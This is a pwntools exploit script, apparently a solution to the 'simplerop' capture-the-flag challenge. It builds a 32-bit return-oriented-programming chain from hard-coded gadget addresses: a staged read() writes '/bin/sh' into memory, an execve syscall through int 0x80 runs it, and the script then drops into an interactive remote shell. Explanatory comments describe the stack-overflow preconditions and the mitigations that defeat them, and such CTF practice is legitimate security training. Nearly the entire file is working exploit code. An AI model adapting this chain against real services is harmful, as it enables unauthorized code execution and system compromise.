from pwn import *
from LibcSearcher import *

# Target profile for pwntools: 32-bit x86 Linux. The 'debug' log level makes
# pwntools log the traffic it sends and receives.
context(os='linux',arch='i386',log_level='debug')
# Terminal command pwntools uses when it has to open a new window
# (e.g. for a debugger): a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h']

# Active target: a service on a private (RFC 1918) lab address. The two
# commented alternatives run the binary locally or connect to a hosted
# CTF instance instead.
io = remote('192.168.95.133',10001)
# io = process('./simplerop')
# io = remote('node4.buuoj.cn',27004)

# Local copy of the challenge binary; this script only uses it to resolve
# the `main` symbol.
elf = ELF('./simplerop')
# Blocks until a key is pressed -- presumably to leave time to attach a
# debugger before any data is exchanged.
pause()

# Hard-coded absolute addresses inside ./simplerop. They are only meaningful
# for this exact build loaded at a fixed base (i.e. a non-PIE binary).
# NOTE(review): the comments below restate what each name says the address
# holds; none of it can be verified from this file -- confirm against the
# binary.
int_0x80_add = 0x080493e1  # `int 0x80`, the i386 syscall trap
pop_eax_ret = 0x080bae06  # pop eax; ret
pop_edx_ecx_ebx_ret = 0x0806e850  # pop edx; pop ecx; pop ebx; ret
read_fun_addr = 0x0806CD50  # read() inside the binary -- presumably statically linked
str_binsh_addr = 0x080EA0A6  # destination of the staged read(); must be writable memory
data2_addr = 0x080EA0C2  # second scratch address; referenced only by the commented-out payload

pop_esi_edi__ebp_ret=0x0804838c  # referenced only by the commented-out payload

# Resolved from the ELF symbol table instead of being hard-coded; referenced
# only by the commented-out payload.
main_addr = elf.symbols["main"]


# Synchronise on the service prompt before sending anything.
io.recvuntil(b"Your input :")



# Layout of the data sent in response to the prompt. flat() packs each integer
# as a 32-bit little-endian word because context.arch is i386.
#   1. 32 filler bytes -- the author's offset to the saved return address.
#      NOTE(review): the offset cannot be verified from this file.
#   2. read(0, str_binsh_addr, 8): control returns into read_fun_addr; the
#      pop/pop/pop/ret gadget sits in the return-address slot and discards the
#      three arguments afterwards.
#   3. eax = 11 (execve on i386), edx = 0, ecx = 0, ebx = str_binsh_addr, then
#      `int 0x80`, i.e. execve(str_binsh_addr, NULL, NULL).
# What this depends on in the target (presumably, given the hard-coded values):
# an input read with no length bound, no stack canary, and code at fixed
# addresses. Bounding the read, enabling a stack protector, or building as PIE
# under ASLR each removes one of those preconditions.
payload = flat(b"A"*32, read_fun_addr,pop_edx_ecx_ebx_ret, 0x0,str_binsh_addr,8)
payload += flat(pop_eax_ret, 11, pop_edx_ecx_ebx_ret, 0x0, 0x0, str_binsh_addr,int_0x80_add)


# Earlier variant kept for reference; it is the only user of
# pop_esi_edi__ebp_ret, main_addr and data2_addr.
# payload = flat(b"A"*32, read_fun_addr,pop_esi_edi__ebp_ret, 0x0,str_binsh_addr,8)
# payload += flat(read_fun_addr,main_addr, 0x0,data2_addr,8)

# pause()
io.sendline(payload)
# pause()
# io.sendline(b"aaaaaaaa")
# Input for the staged read(): 8 bytes ("/bin/sh" plus a NUL terminator),
# matching the length argument placed in the chain above.
io.sendline(b"/bin/sh\x00")
# Hand the connection over to the operator's terminal.
io.interactive()